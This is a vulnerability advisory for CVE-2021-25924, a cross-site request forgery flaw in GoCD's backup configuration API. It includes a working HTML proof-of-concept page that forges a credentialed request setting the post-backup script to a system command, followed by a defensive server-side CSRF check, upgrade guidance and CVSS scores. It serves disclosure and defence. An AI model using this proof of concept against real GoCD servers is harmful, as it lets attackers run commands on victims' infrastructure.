CVE-2021-25924

Date: April 1, 2021

Overview

In GoCD, versions 19.6.0 to 21.1.0 are vulnerable to Cross-Site Request Forgery because the `/go/api/config/backup` endpoint has no CSRF protection. An attacker can trick a victim into clicking a malicious link that changes the backup configuration or causes system commands to be executed via the post_backup_script field.

Details

GoCD is vulnerable to Cross-Site Request Forgery because the `/go/api/config/backup` endpoint has no CSRF protection. By enticing an authenticated user to visit an attacker-controlled website, the attacker can change the backup configuration settings in that user's name, for example setting the post_backup_script field so that system commands are executed, or changing the backup schedule.

PoC Details

Create an HTML file with the content below. When an authenticated user opens the malicious link sent by the attacker, the browser sends the forged request (with the user's session cookie attached) to the legitimate server, and the backup configuration is changed.

PoC Code

<html>
  <script>
    function backup() {
      var xmlhttp = new XMLHttpRequest();
      xmlhttp.withCredentials = true;
      xmlhttp.open("POST", "http://localhost:8153/go/api/config/backup", true);
      xmlhttp.setRequestHeader("Accept", "application/vnd.go.cd.v1+json");
      xmlhttp.send(JSON.stringify({
        "schedule": null,
        "post_backup_script": "poweroff",
        "email_on_success": false,
        "email_on_failure": false
      }));
    }
    backup();
  </script>
</html>
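The request above reaches the server because a POST whose only extra header is the CORS-safelisted `Accept` header, sent with the XHR default Content-Type of text/plain, is a "simple" request: the browser sends it cross-origin, cookie included, with no preflight. The server therefore has to reject it itself. The following is an added example of such a server-side gate, written for this page and not GoCD's own fix; the allowed origin, the `X-Requested-With` convention and the sample requests are assumptions constructed for the illustration.

```javascript
// Added example, not GoCD's code: a server-side CSRF gate for a
// state-changing JSON API such as /go/api/config/backup.
//
// Two independent checks, each of which stops the PoC request:
//  1. Origin allow-list: browsers attach an Origin header to cross-origin
//     POSTs, so a value outside the application's own origin is rejected.
//  2. A required custom header (X-Requested-With) that is not on the CORS
//     safelist: a foreign page cannot add it without a preflight, which
//     this server never approves, so the credentialed request is never sent.
// A per-session anti-CSRF token is the more general fix; it is left out
// here to keep the example self-contained.

const STATE_CHANGING = new Set(["POST", "PUT", "PATCH", "DELETE"]);

// Assumption: the deployment's own origin, i.e. the URL the PoC targets.
const ALLOWED_ORIGINS = new Set(["http://localhost:8153"]);

// `req` is a plain object { method, headers } with lower-case header names,
// the shape Node's http.IncomingMessage exposes.
// Returns { allowed: boolean, reason: string }.
function csrfGate(req) {
  const method = String(req.method).toUpperCase();
  if (!STATE_CHANGING.has(method)) {
    return { allowed: true, reason: "safe method, no state change" };
  }
  const origin = req.headers["origin"];
  if (origin !== undefined && !ALLOWED_ORIGINS.has(origin)) {
    return { allowed: false, reason: "cross-origin request from " + origin };
  }
  // Require the custom header on every state-changing API call, so a
  // request that arrives without an Origin header is not trusted either.
  if (req.headers["x-requested-with"] !== "XMLHttpRequest") {
    return { allowed: false, reason: "missing X-Requested-With header" };
  }
  return { allowed: true, reason: "same-origin API request" };
}

// Constructed sample requests (not captured traffic).
// 1. What a browser sends when the PoC page runs from an attacker's origin:
//    the Accept header from the PoC, the XHR default Content-Type, and the
//    victim's session cookie, but no custom header.
const CROSS_ORIGIN_REQUEST = {
  method: "POST",
  headers: {
    origin: "http://attacker.example",             // constructed placeholder
    accept: "application/vnd.go.cd.v1+json",
    "content-type": "text/plain;charset=UTF-8",
    cookie: "<session cookie placeholder>",
  },
};
// 2. The same API call made by the application's own UI from its own origin.
const SAME_ORIGIN_REQUEST = {
  method: "POST",
  headers: {
    origin: "http://localhost:8153",
    accept: "application/vnd.go.cd.v1+json",
    "content-type": "application/json",
    "x-requested-with": "XMLHttpRequest",
    cookie: "<session cookie placeholder>",
  },
};

function demo() {
  return {
    crossOrigin: csrfGate(CROSS_ORIGIN_REQUEST),
    sameOrigin: csrfGate(SAME_ORIGIN_REQUEST),
    read: csrfGate({ method: "GET", headers: {} }),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

In the output the cross-origin request is rejected on the Origin check, the same-origin UI call passes, and a GET is never gated because it changes no state. Note that the check is an allow-list on Origin, not a block-list: any origin the server does not recognise, including an absent custom header on a request with no Origin at all, is refused.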

Affected Environments

19.6.0-21.1.0

Prevention

Upgrade to 21.2.0

Language: Java

Good to know:


Cross-Site Request Forgery (CSRF)

CWE-352

Upgrade Version

Upgrade to version 21.2.0


Base Score (CVSS v3):
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): Required
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High

Base Score (CVSS v2):
Access Vector (AV): Network
Access Complexity (AC): Medium
Authentication (AU): None
Confidentiality (C): Complete
Integrity (I): Complete
Availability (A): Complete